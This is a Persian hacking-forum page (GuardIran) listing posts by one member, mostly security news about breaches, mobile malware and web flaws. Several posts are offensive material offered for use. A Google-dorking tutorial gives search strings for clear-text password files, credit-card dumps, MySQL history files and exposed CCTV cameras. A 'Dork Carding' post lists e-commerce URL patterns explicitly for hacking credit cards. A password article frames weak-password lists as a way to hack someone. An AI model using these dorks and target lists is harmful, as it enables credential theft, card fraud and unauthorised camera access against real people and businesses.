رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'mR_007'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

  1. Mr_007

    جستجو IP مهاجم هنگام DDOS

    عرض سلام و خسته نباشید. تو این فیلمیاد میگیرین که چطور میتونین ای پی مهاجم رو پیداکنین. مبحث بسیار مهم برای کسانی که سرور دارند و مورد حمله ی دیداس قرار میگیرن. جستجو IP.zip
  2. سلام اینم اموزش عالی و کاربردی { bypass error 500 } توی بیشتر سایت ها ادمین برخی قسمت ها رو غیرقابل دسترسی میکنه که یکی از اون ها میتونه قسمت ذخیره شدنه پسورد و یوزرنیم باشه. شما با بایپس کردن این بخش ها میتونیدکار های زیادی انجام بدین. رمز فایل : gaurdiran.org تشکر فراموش نشه بایپس.rar
  3. Mr_007

    ضعیف ترین پسوردهای سال ۲۰۱۵

    قتی به دنبال هک کردن کسی هستید می توانید کار را با امتحان کردن رمزهای آسان مانند 123456می توانید شروع کنید. هرساله در SplashData لیستی از "بدترین پسوردهای سال" اعلام می شود. به نظر می رسد کاربران هنوز هم پسوردهایساده از ترکیب اعداد را بیشتر به کار می گیرند. با توجه به بیانات SplashData، از بین ده پسورد رایج امسال 6 پسورد فقط شامل ترکیبی از اعداد هستند. در این لیست پسوردهایی مانند ترکیب الگوهایی از حروف روی صفحه کلید هم به چشم می خورد. امیدواری جدید Morgan Slain مدیرعامل SplashData، در بیانیه ای اعلام داشت: بیشتر افراد تلاش دارند با افزودن کاراکترها به پسورد هایشان آن ها را ایمن تر بسازند، اما وقتی این پسورد های طولانی بر اساس الگوهای ساده ساخته شوند در معرض خطر سرقت اطلاعات توسط هکر ها قرار می گیرند." این بدان معناست که پسورد هایی هم که بر اساس ترتیبات صفحه کلید مانند 1qaz2wsx یا qwertyuiop (اولین دو ستون و یا سطر بالایی صفحه کلیدهای استاندارد، به ترتیب) ساخته می شوند، همانند پسورد های ساده کاربران را در معرض خطر قرار می دهند. استفاده از ورزش یا سرگرمی های مورد علاقه هم برای ساختن پسورد ها ایده خوبی محسوب نمی شود. کلماتی مانند "فوتبال" و "بیسبال" از جمله 10 پسورد رایج در سال اخیر بودند. از دیگر پسورد های ساده در این لیست می توان به welcome و login اشاره کرد. حتی طرفداران داستان های علمی تخیلی هم قربانی این پسوردهای ضعیف شده اند. به لطف پیش بینی برای انتشار فیلم جدید starwars، کلماتی مانند starwar، solo، princess در بین 25 رمز رایج مورد استفاده کاربران قرار گرفتند. Slain خاطرنشان کرد که استفاده از ورزش یا اصطلاحات فرهنگ پاپ به عنوان رمز عبور ایده خوبی نیست و با تبلیغات بیشتر در مورد خطر پسوردهای ضعیف، قصد داریم مردم را به تقویت پسورد های خود و استفاده از پسورد های جداگانه برای سایت های مختلف ترغیب کنیم. ساختن پسورد های بهتر SplashData، که برنامه های مدیریت پسورد را برای کاربران ارائه می دهد، لیستی از دو میلیون پسورد که در سال اخیر به بیرون درز پیدا کرده اند را گردآوری کرده است. اگرچه بعضی از این پسوردها در سال 2015 به مراتب طولانی تر از سال قبل بودند اما چون از الگوهای ساده در آن استفاده می شد حدس زدن آن ها برای هکر ها آسان بود. این شرکت سه توصیه به کاربران برای ساختن پسورد های ایمن تر دارد: اول اینکه، کاربران و شرکت ها همیشه از پسورد هایی با حداقل 12 کاراکتر شامل ترکیبی از کاراکترها مانند حروف، اعداد و علائم نقطه گذاری استفاده کنند. دوم، کاربران از پسورد های یکسان برای سایت های مختلف استفاده نکنند. و پیشنهاد سوم استفاده از برنامه های مدیریت پسورد برای تولید پسوردهای جدید و تصادفی برای سایت های مختلف است. که این بعضی وقت ها خود یک مشکل محسوب می شود: زیرا به تازگی یکی از برنامه های مدیریت پسورد به نام LastPassتوسط هکر ها آسیب پذیر بوده و استفاده از آن کاربران را در معرض خطر بیشتری قرار می دهد.
  4. وب امروز با آموزش دورک نویسی و ساخت دورک در گوگل هکینگ در خدمت شما دوستان هستم این آموزش اختصاصی گارد ایران هست و کپی با ذکر منبع مشکلی نداره :دی خو بریم سراغ آموزش شما در دورک با شش گزینه معمولا مواجه میشید که من این شش گزینه رو توضیح میدم 1) Intitle : 2) Filetype : 3) Site : 4) Related 5) Inurl : 6)Intext : این پنج گزینه در اول هر دورک میان Intitle : خوب گزینه یک که Intitle هست رو توضیح میدم خوب اگر شما دنبال کلمه ای در متن title سایت میخواین جستو جو کنید از Intitle : استفاده کنید مثال: Intitle : Hacking. Intitle : Security. Intitle : guardiran.org خوب با جست و جوی این کلمات در گوگل به این شکل که در مثال گفته شده خودتون متوجه موضوع میشید. خوب گاهی پیش میاد که که شما میخواین یک سایت خاص یا دامین خاص مثال .ir - .org - .net -.com و .... جست و جو کنید در این مواقع از دستور Site: استفاده میکنیم مثال میخوایم کلمه هک رو در سایت گارد ایران جست و جو کنیم دورک ما به این شکل میشه intext:هک site:guardiran.org یا میخواین کلمه هک رو فقط در دامین های .ir جست و جو کنید دورک ما به این شکل میشه InText:هک Site:.ir خوب در دورک های بالا شما یه دستور دیگه میبینید به اسم Intext که فکر کنم متوجه کارش شده باشید این دستور در متن سایت ها جست و جو میکنه دستور بعدی Filetype هست از اسمش هم معلومه کارش چیه این دستور یک فایل خاص رو برای شما جست و جو میکنه مثال شما میخواین در سایت گارد ایران دنبال فایل pdf بگردید دورک ما به شکل زیر میشه Site:guardiran.org Filetype: PDF شما با دستور FileType میتونید فایل هایی مثل mp3 - pdf - docs & ... رو جست و جو کنید filetype : ppt Security filetype : pdf security filetype : doc Intitle: "security" etc مجموعه دورک برای پیدا کردن دوربین مدار بسته inurl: view/index.shtml. intitle:liveapplet intitle:axis intitle:"video server" intitle:"EvoCam" inurl:"webcam.html" intitle:"Live NetSnap Cam-Server feed" intitle:"Live View / - AXIS 206M" intitle:"Live View / - AXIS 206W" intitle:"Live View / - AXIS 210" inurl: indexframe.shtmlaxis. intitle:"Live View / - AXIS" intitle:"WJ-NT104 Main Page" intitle:snc-z20 inurl:home/ intitle:snc-cs3 inurl:home/ intitle:snc-rz30 inurl:home/ intitle:"sony network camera snc-p1" viewnetcam.com intitle:"Toshiba Network Camera" user login intitle:"i-Catcher Console-Webmoniter". نمونه ای از دورک های گوگل هکینگ Dorks for finding usernames and passwords: auth_user_file.txt Gives you list of crackable passwords “login: *” “password: *” filetype: xls Gives passwords file in saved in excel filetype:log inurl:”password .log” Clear text password files Dorks for finding Credit cards: “ATM PIN” ReZult Credit card dumps by phishers Dorks for MYSQL dumps: ?intitle:index.of?”.mysql_history Gets you the MySQL history files Input validation vulnerabilities: intext:”Powered by X-Cart: shopping cart software” -site:x-cart.com به زودی اموزش ویدیوی ای قرار خواهد گرفت امید وارم از این آموزش کمال استفاده رو برده باشید تشکر فراموش نشه : دی
  5. Dork Carding – دورک های جدید برای هک کارت های اعتباری ( Master Card – Visa Card – …. ) checkout.asp?UserID= checkout.asp?cartid= checkout.cfm?UserID= checkout.cfm?cartid= checkout.php?UserID= checkout.php?cartid= checkout1.asp?cartid= checkout1.cfm?cartid= checkout1.php?cartid= checkout_confirmed.asp?order_id= checkout_confirmed.cfm?order_id= checkout_confirmed.php?order_id= db/CART/product_details.asp?product_id= db/CART/product_details.php?product_id= eshop.php?id= estore/products.php?cat= garden_equipment/Fruit-Cage/product.asp?pr= garden_equipment/Fruit-Cage/product.php?pr= garden_equipment/pest-weed-control/product.asp?pr= garden_equipment/pest-weed-control/product.php?pr= getbook.asp?bookid= getbook.cfm?bookid= getbook.php?bookid= giftDetail.asp?id= giftDetail.cfm?id= giftDetail.php?id= giftshop/product.php?proid= global/product/product.asp?gubun= global/product/product.php?gubun= goods_detail.asp?data= goods_detail.php?data= goods_detail.php?goodsIdx= inurlrod_detail.php?id= inurlrod_detail.php?id= inurlrod_info.php?id= inurlrod_info.php?id= inurlroduct-item.php?id= inurlroduct-item.php?id= inurlroduct.php?id= inurlroduct.php?id= inurlroduct_ranges_view.php?ID= inurlroduct_ranges_view.php?id= inurlroductdetail.php?id= inurlroductdetail.php?id= inurlroductinfo.php?id= inurlroductinfo.php?id= inurlroduit.php?id= inurlroduit.php?id= inurl:shop.php?do=part&id= inurl:shop.php?do=part&id= inurl:shop_category.php?id= inurl:shopping.php?id= inurl:shopping.php?id= inurl:view_product.php?id= inurl:view_product.php?id= irbeautina/product_detail.asp?product_id= irbeautina/product_detail.php?product_id= item.asp?eid= item.asp?id= item.asp?iid= item.asp?item_id= item.asp?itemid= item.asp?model= item.asp?prodtype= item.asp?shopcd= item.asp?sub_id= item.cfm?eid= item.cfm?item_id= item.cfm?itemid= item.cfm?model= item.cfm?prodtype= item.cfm?shopcd= item.php?SKU= item.php?cat= item.php?code= item.php?eid= item.php?id= item.php?iid= item.php?item= item.php?item_id= item.php?itemid= item.php?model= item.php?prodtype= item.php?shopcd= item.php?sub_id= item/detail.php?num= item/wpa-storefront-the-ultimate-wpecommerce-theme/discussion/61891?page= itemDesc.asp?CartId= itemDesc.cfm?CartId= itemDesc.php?CartId= item_book.asp?CAT= item_book.php?CAT= item_details.asp?catid= inurl:".php?cat=" intext:"shopping" inurl:".php?cat=" intext:"add to cart" inurl:".php?cat=" intext:"Buy Now" inurl:".php?cat=" intext:"View cart" inurl:".php?cat=" intext:"boutique" inurl:".php?cat=" intext:"/store/" inurl:".php?cat=" intext:"/shop/" inurl:".php?cat=" intext:"Toys" inurl:".php?catid=" inurl:".php?catid=" intext:"View cart" inurl:".php?catid=" intext:"Buy Now" inurl:".php?catid=" intext:"add to cart" inurl:".php?catid=" intext:"shopping" inurl:".php?catid=" intext:"boutique" inurl:".php?catid=" intext:"/store/" inurl:".php?catid=" intext:"/shop/" inurl:".php?catid=" intext:"Toys" inurl:".php?categoryid="
  6. در یکی از اشتباهات محرز تاریخی، پسورد 98 میلیون کاربر روس پس از هک شدن لو رفت. پرتال بزرگ روسی به نام Rambler.ru به عنوان جدیدترین قربانی دنیای هک با اشتباه محرز ادمین خود روبرو شد، چراکه پسورد 98 میلیون کاربر در یک فایل plaintext ذخیره شده بود که با لو رفتن این فایل از روی دیتابیس اطلاعات کاربران هک شد. هک دیتابیس مشتریان این پرتال که سرویس دهنده ایمیل نیز هست شامل حساب کاربری، آدرس ایمیل، دیتای شبکه های اجتماعی و پسورد کاربران می شود که همگی در یک فایل تکست به صورت رمزگذاری نشده ذخیره شده بود و بدین معناست که هرکسی به راحتی قادر به دیدن پسوردها است. آخرین بار هک سایت VK.com و سرقت 171 میلیون حساب کاربری در روسیه رسانه ای شد و حالا سایت رامبلر در کنار لینکداین، last.fm و مای اسپیس قرار می گیرد که دیتابیس آن ها نیز موردحمله هکری قرارگرفته و دچار آسیب شده اند. گفتنی است سایت Rambler.ru در سال 1996 تأسیس شد و یکی از بزرگ ترین سایت های اینترنتی جهان است که داخل روسیه رقیب بزرگی برای یاندکس و mail.ru به شمار می رود. منبع: خبرآنلاین
  7. تا کاربران در معرض خطر سرقت شدن اطلاعات و حملات فیشینگ قرار بگیرند. بن هالپرن (Ben Hepern)، یکی از توسعه دهنده های زبان های رابی و جاوا اسکریپت، علت به وجود آمدن آسیب پذیری مذکور را ویژگی های به کار رفته در target بیان کرده و گفت: «زمانی که یک وبگاه از target=_blank برای باز کردن یک لینک در یک زبانه یا پنجره ی جدید استفاده می کند، برای دسترسی به پنجره ی جدید از رابط برنامه نویسی نرم افزار " window.opener API" استفاده کرده و دسترسی های محدودی را به دست می آورد. این دسترسی ها تعدادی از محدودیت های دامنه ی متقابل را حذف می کنند.» از لحاظ نظری یک هکر می تواند با استفاده از صفت های انتقال به یک صفحه ی جدید، کدهای مخربی را در صفحه ی وبی که در یک پنجره یا زبانه ی تازه باز می شود، قرار بدهند. سپس زمانی که کاربر روی لینک قرارگرفته در صفحه ی مبدأ کلیک می کند، یک پنجره ی جدید باز شده و شروع به برگزاری می شود. در همین زمان، کدهای مخرب فعالیت خود را آغاز و با استفاده از صفت یاد شده یک صفحه ی فیشینگ را (به عنوان مثال در صفحه ی مبدأ) ایجاد می کند. هم اکنون فیس بوک تحت تأثیر آسیب پذیری مذکور در تمام مرورگرها قرار می گیرد. این درحالی است که شبکه ی اجتماعی توییتر تنها در زمان استفاده از مرورگر سافاری تحت تأثیر قرار گرفته و اینستاگرام به صورت کامل این آسیب پذیری را بر طرف کرده است. هالپرن با بیان این که هکرها می توانند از طریق روش مذکور به سرقت اطلاعات کاربران بپردازند، گفت: «زمانی که یک حمله ی فیشینگ با استفاده از این روش صورت می گیرد، هکر از طریق صفحه ی جدید باز شده، به صفحه ی اصلی دسترسی دائمی پیدا می کند و می تواند به راحتی اطلاعات خصوصی کاربر را سرقت کند.» طراحان وبگاه ها باید برای بر طرف کردن آسیب پذیری ذکر شده، صفت «rel=noopener» را به تمام لینک هایی که از «target=_blank» استفاده می کنند اضافه کنند. اگرچه مرورگر فایرفاکس از صفت یاد شده پشتیبانی نکرده و برای رفع آسیب پذیری در این مرورگر باید از «rel=noopener noreferrer» استفاده شود. منبع: سایبربان
  8. محققان موفق به کشف بدافزار DressCode در 40 اپلیکیشن اندروید موجود در گوگل پلی شده اند. پیش بینی می شود این اپلیکیشن های آلوده توسط 500 هزار تا 2 میلیون کاربر دانلود شده باشند. این اپلیکیشن ها از ماه آوریل سال 2016 روی گوگل پلی بارگذاری شده بود. کارشناسان امنیتی شرکت چک پوینت (Check Point)، ادعا می کنند این بدافزار، اپلیکیشن های آلوده را به سرورهای پراکسی و بات نت تبدیل می کند. بات نت ها بوسیلۀ هکرها برای کنترل ابزارهای متصل به اینترنت به منظور توزیع لینک های کلاه برداری و باج افزارها، استفاده می شوند. ظرفیت هر بات نت به سایز آن بستگی دارد و در مورد بدافزار مذکور هدف تنها ایجاد ترافیک IP مجازی برای استفادۀ هکرها و وب گاه های شخص سوم اپلیکیشن های مذکور بوده است. زمانی که اپلیکیشن آلوده روی تلفن همراه اندرویدی نصب شود، بدافزار با سرور ارتباط برقرار می کند. سرور مربوط بلافاصله به بدافزار دستور می دهد به حالت خاموش باقی بماند تا زمانی که سرور دستور تبدیل ابزار به ساکس پراکسی و ایجاد ترافیک را صادر کند. این بدافزار همچنین می تواند به هکرها اجازۀ دسترسی به شبکه های متصل به تلفن همراه را نیز بدهد. با استفاده از این روش هکرها می توانند به سرقت اطلاعات دست زده و یا سیستم امنیتی سازمان ها را دچار اختلال کنند. منبع: باشگاه خبرنگاران جوان
  9. باشگاه خبرنگاران جوان؛ اگر تاکنون گوشی های آیفون و یا آیپد های خود را آپدیت نکرده اید، همین الان این کار را انجام دهید و سیستم عامل iOS 9.3.5 را بر روی دستگاه های خود نصب کنید. برای این کار به قسمت setting رفته براساس مراحل زیر عمل کنید: Settings > General > Software Update براساس گزارشی که توسط وب سایت مشیبل منتشر شد؛ کاربرانی که این آپدیت را انجام نمی دهند در معرض خطر جدی هک شدن قرار می گیرند؛ یک بد افزار مخفی که می تواند خودش بر روی دستگاه شما نصب شود، تمام اطلاعات شما را به صورت مخفیانه به سرقت می برد. این بد افزار حتی قادر است بدون اینکه رد پایی از خودش بر جای گذارد، از روی دستگاه های کاربران اپل uninstall و یا غیر فعال شود. روز پنج شنبه دو گزارش از نیویورک تایمز و مادربرد منتشر شد که نشان می داد چگونه سه حفره امنیتی بزرگ که در آپدیت جدید برطرف شده اند، می توانند توسط هکر ها مورد سوء استفاده قرار گیرند و تمام اطلاعات شخصی شما را از روی دستگاه های دارای سیستم عامل ios بین برند.
  10. در ماه های گذشته چندین انفجار و آتش سوزی در مچتمع های پتروشیمی جنوب کشور رخ داد. هم زمانی این اتفاقات با خبر کشف بدافزارهایی در سیستم های تاسیساتی پتروشیمی در کشور باعث ایجاد این تصور شد که شاید ارتباطی میان آلوده شدن سیستم ها به نوعی ویروس و انفجار مخازن پتروشیمی وجود داشته باشد. با این حال به نظر می رسد چنین تصوری چندان صحیح نباشد. با سخت افزار همراه باشید. به گزارش رویترز و به نقل از خبرگزاری ایرنا، مسئولان امنیتی پتروشیمی ایران موفق به کشف و نابود کردن دو بدافزار مخرب در تاسیسات پتروشیمی شده اند. به گفته مقامات امنیتی، این بدافزارها در فاز غیر فعال قرار داشته و نقشی در ایجاد آتش سوزی های اخیر نداشته اند. سرتیپ غلامرضا جلالی، رئیس سازمان پدافند غیر عامل ایران، در توضیحاتی که در این زمینه توسط ایرنا منتشر شده اند عنوان کرده است که اقدامات لازم برای جلوگیری از انجام هر گونه عملیات خرابکارانه توسط این بدافزارها صورت گرفته است. تاسیسات حیاتی ایران در سال های اخیر به شدت مورد حمله گروه های وابسته به دولت های خارجی قرار داشته اند. از جمله این اتفاقات می توان به آلوده شدن بخشی از تاسیسات هسته ای کشور به ویروس استاکس نت اشاره کرد که باعث بروز برخی خسارات در سامانه های غنی سازی ایران شده بود و سپس کشف و خنثی شد. هفته گذشته نیز وزیر نفت یکی از دلایل بروز این آتش سوزی ها را، کاهش بودجه امنیت و نظارت از سوی شرکت های خصوصی فعال در این بخش اعلام کرده بود.
  11. محقق امنیت بریتانیایی، آیدان وودز (Aidan Woods)، در آخرین تحقیقات خود متوجه شده که صفحه ی ورود گوگل (Google's login page)، به هکرها اجازه می دهد به طور خودکار، بدافزارهای خود را روی سیستم کاربر دانلود کنند. به گفته ی این محقق، این آسیب پذیری با کلیک روی گزینه ی Sign In آغاز می شود. این مشکل امنیتی به دلیل استفاده ی گوگل از 'continue=[link]'، به عنوان پارامتر در آدرس صفحه (page URL) برای انتقال کاربر به صفحه ی تأیید هویت، اعلام شده است. البته خود گوگل نیز از این موضوع نگران بوده و این پارامتر را تنها برای صفحه ی google.com خود استفاده کرده است. این در حالی است که این کارشناس متوجه شده که این مشکل گوگل بر drive.google.com و docs.google.com نیز تأثیر داشته است. یک هکر هوشمند می تواند بدافزار خود را روی گوگل درایو یا گوگل داکس بارگذاری کند و از آدرس آن در داخل صفحه ی ورود گوگل استفاده کند. در این حالت زمانی که فردی این لینک را در ایمیل خود دریافت کند، آن را همانند آدرس واقعی صفحه ی ورود گوگل، می پندارد. زمانی که کاربر روی گزینه ی ورود کلید کند، به طور خودکار بدافزار روی سیستم دانلود می شود. از سویی دیگر، اگر هکر فایل خود را "Login_Challenge.exe" یا "Two-Factor-Authentication.exe" نام گذاری کند، می تواند کاربران حرفه ای تر را نیز به نصب بدافزار ترغیب کند. این متخصص بریتانیایی ادعا می کند، این موضوع را به گوگل گزارش داده است، اما گروه امنیتی گوگل توجهی به پیام های او نکرده اند.
  12. به نقل از پی سی مگ، بررسی های قضایی در آمریکا نشان می دهد یک مرد روس عامل اصلی این حملات است. وی توانسته به هزاران شعبه بانک در آمریکا نفوذ کند. وزارت دادگستری آمریکا نام این مرد را Roman Valerevich Seleznev اعلام کرده است. وی با استفاده از نام کاربری Track2 حملات هکری خود را از اکتبر سال 2009 تا اکتبر سال 2013 انجام داده است. هکر مذکور موفق به نصب بدافزارهای مخربی برروی هزاران پایانه خرید اینترنتی یا POS شد و از این طریق شماره های کارت اعتباری صاحبان مشاغل کوچک را سرقت کرد. این اطلاعات بر روی سروری ذخیره شده که در یکی از کشورهای آمریکا، روسیه، مولداوی یا اوکراین قرار دارد. وی با فروش این اطلاعات پول کلانی به جیب زده و بخش از آنها را هم برای خریدهای شخصی به کار برده است. حجم سرقت های مالی این فرد تا بدان حد گسترده بوده که موجب ورشکستگی برخی صاحبان مشاغل کوچک در آمریکا شده است. به عنوان مثال یک رستوران کوچک در سیاتل به نام Broadway Grill به علت حجم پول مسروقه ورشکست شد. این هکر 32 ساله روس از جولای سال 2014 در بازداشت به سر می برد و در لپ تاپ او اطلاعات بیش از 1.7 میلیون کارت اعتباری مسروقه یافت شده است. حبس طولانی مدت و جریمه سنگین در انتظار این فرد متخلف است.
  13. روزنامه آمریکایی واشنگتن‌پست در گزارشی مدعی شد که سامانه‌های ثبت‌نام رأی‌دهندگان در ایالات «ایلینوی» و آریزونا هدف حملات هکرهای روسیه قرار گرفته است و مأموران «اف بی آی» در ماه وئن به مقامات آریزونا هشدار داده بود که روسیه پشت حملات سایبری به سامانه انتخابات در این ایالت هستند. «مت رابرتس» سخنگوی «مایکل ریگان» رئیس ایالت آریزونا روز دوشنبه گفت که مأموران اف بی آی این تهدیدات سایبری را بزرگ و چشمگیر توصیف کرده‌اند. طبق این گزارش، ریگان در نتیجه این حمله هکری، به مدت یک هفته سامانه ثبت‌نام رأی‌دهندگان ایالت آریزونا را غیرفعال کرد. روزنامه واشنگتن‌پست گزارش کرد که مشخص شده است که هکرها، سامانه ثبت‌نام رأی‌دهندگان این ایالت یا حتی هیچ‌یک از سامانه‌های مناطق مختلف این ایالت را در معرض خطر قرار نداده‌اند بلکه نام کاربری و رمز عبور یکی از مقامات انتخاباتی در منطقه «گیلا» را به سرقت برده‌اند. رابرتس می‌گوید، بازرسان اف بی آی هنوز مشخص نکرده‌اند که هکرها جزء باند تبهکاران بوده‌اند یا اینکه دولت روسیه آنها را به استخدام درآورده است. مأموران اف بی آی روز دوشنبه حاضر نشدند در اینباره پاسخی بدهند.
  14. مقامات دولتی و کارشناسان امنیت سایبری در عربستان سعودی، اقدام به برگزاری نشستی اضطراری در شهر ریاض عربستان کردند. این نشست بعد از بروز چندین حمله سایبری به زیرساخت‌های دولتی در این کشور برگزار شد. خبرگزاری‌های رسمی در عربستان در اخبار مرتبط با این موضوع، عنوان کردند که طی هفته‌های اخیر، حملات سایبری متعددی، نهادها و سازمان‌های دولتی و زیرساخت‌های حیاتی را در این کشور، مورد تهاجم قرار داده و دولت عربستان، نشست مذکور را برای یافتن راه‌کاری به جهت مقابله با این حملات تشکیل می‌دهد. البته سعودی‌ها از بیان جزئیات در مورد اینکه کدام نهادها و سازمان‌ها در این حمله مورد تهاجم قرار گرفتند یا اینکه وسعت حمله چه میزان بوده و چه گروه یا کشوری پشت این حملات است، خودداری کرده‌اند. ظاهراً در جلسه مذکور، در مورد راهکارهای امن سازی دولت در برابر حملات سایبری و فرایندهای احتمالی بحث و تبادل‌نظر شده است. همچنین در خبر مذکور آمده که این حمله سایبری از جانب یک کشور خارجی بوده است و هکرها از بدافزارها برای جاسوسی از قربانیان خود استفاده کرده‌اند. در پایان لازم به ذکر است که در خبر فوق، به حمله سایبری سال 2012 به شرکت نفت آرامکو عربستان سعودی اشاره شده که سعودی‌ها در آن سال، اتهام این حمله را به جمهوری اسلامی ایران نسبت دادند.
  15. به نقل از بیزینس اینسایدر، آیدان وودز محقق امنیتی با ارسال مطلبی در وب سایت شخصی خود می گوید از تعاملاتی که با گروه امنیتی گوگل داشته ناامید شده و به همین علت در این زمینه به عموم کاربران اطلاع رسانی کرده است. ظاهرا کارشناسان امنیتی گوگل موضوع را یک حفره امنیتی تلقی نمی کنند و قصد ندارند برای رفع آن کاری کنند. اطلاعات تفصیلی در این زمینه از آدرس [Hidden Content] در دسترس است. وی اظهار امیدواری کرده که افشای عمومی موضوع، گوگل را تشویق به تغییر در رفتار خود کند و این شرکت در نهایت برای رفع این حفره امنیتی اقدام کند. بررسی های این کارشناس نشان می دهد صفحه لاگین گوگل افزودن یک پارامتر اضافی به نام ادامه یا continue را ممکن می کند و از این طریق می توان یک کاربر را به سمت آدرس های دیگر اینترنتی هدایت کرد و در این زمینه تنها محدودیت آن است که آدرس جدید باید با google.com شروع شود. بنابراین هکرها میتوانند با افزودن مثلا ?continue=[Hidden Content] به URL صفحه ورود به گوگل، بعد از وارد کردن نام کاربری و کلمه عبور، کاربران را به سایت مورد نظر خود بکشانند و رایانه یا گوشی وی را به انواع بدافزار و ویروس آلوده کنند. از این طریق به سادگی می توان اطلاعات ورود به گوگل سرقت کرد. انتظار می رود گوگل بعد از بررسی مجدد موضوع ظرف روزهای آینده در این زمینه اعلام موضع کند.
  16. یک شرکت فناوری اسرائیلی، به ایجاد بدافزار برای تلفن‌های هوشمند آیفون و استفاده از آن برای جاسوسی، متهم شد. این شرکت به جاسوسی در مورد فعالان حقوق بشر در خاورمیانه متهم است. این خبر، شرکت اپل را مجبور کرد، به‌روزرسانی جدیدی (نسخه‌ی iOS 9.3.5) برای محصولات خود ارائه کند. شرکت اپل به کاربران خود در مورد سه آسیب‌پذیری در نسخه‌های قبلی محصولات خود، هشدار داد؛ طبق این گزارش، هکرها از این آسیب‌پذیری‌ها برای جاسوسی از خبرنگاران استفاده کرده‌اند. این شرکت که توسط یکی از مقامات سابق ارتش اسرائیل مدیریت می‌شود، معروف به NSO، محکوم ‌به جاسوسی از تلفن‌های هوشمند است. این بدافزار، توسط فعالان حقوق بشر امارات متحده عربی کشف‌شده است. بدافزار قبلا توسط آزمایشگاه شهروندی تورنتو، توسط احمد منصور کشف‌شده بود. وی توسط مقامات اماراتی دستگیر و شکنجه شده و لینکی مشکوک به او ارسال شده بود. این آزمایشگاه دولت امارات را مسئول این عملیات‌ها و ایجاد بدافزار به کمک شرکت اسرائیلی می‌داند. بدافزار مذکور قادر به پیگیری پیام‌های متنی و ایمیل‌ها است. همچنین به کمک این بدافزار می‌توان صوت و تصویر نیز دریافت کرد. همکاری واحد امنیت ارتش اسرائیل با مقامات اماراتی و توسعه‌ی فناوری بخش خصوصی، قبلا نیز مشکلات به وجود آورده و منجر نگرانی دیگر کشورها شده بود. این در حالی است که شرکت NSO، پیش تر اعلام کرده بود، این بدافزار در تلفن‌های اندروید و بلک‌بری نیز قادر به اجرا است.
  17. در پی حملات تروریستی اخیر آلمان، دولت این کشور در حال طراحی و برنامه‌ریزی رویکرد امنیت سایبری خود برای ایجاد آژانس مرکزی فناوری اطلاعات در زمینه امنیت سایبری (Zentrale Stelle für Informationstechnik im Sicherheitsbereich) است؛ این اقدام صرفاً جهت مبارزه و کنترل فعالیت تروریست‌ها در فضای دارک وب به وقوع پیوسته است. توماس دمایزیر (Thomas de Maizière)، وزیر کشور آلمان در جمع خبرنگاران گفت، بخش جدید آژانس مرکزی فناوری اطلاعات، در زمینه امنیت به توسعه‌ی روش‌ها برای مقابله با جرائم رایانه‌ای و مبارزه با تروریسم پرداخته است. وی در ادامه افزود، واحد تأسیس شده با استفاده از قابلیت‌های تهاجمی، به بررسی و بهره‌برداری از فضای دارک وب پرداخته است. این در حالی است که مهاجمان با استفاده از این فضای سایبری به عنوان یک پناهگاه امن برای پیش برد فعالیت‌ها و جرائم غیرقانونی خود اعم از تجارت سلاح و مواد مخدر استفاده می‌کنند. مقامات امنیتی آلمان معتقدند، واحد نام‌برده برای جلوگیری از اقدامات تروریستی در فضای سایبری تشکیل‌شده است. دمایزیر در ادامه افزود برای مبارزه با فعالیت تروریست‌ها در فضای مجازی به تشکیل این واحد امنیت سایبری پرداخته‌ایم.
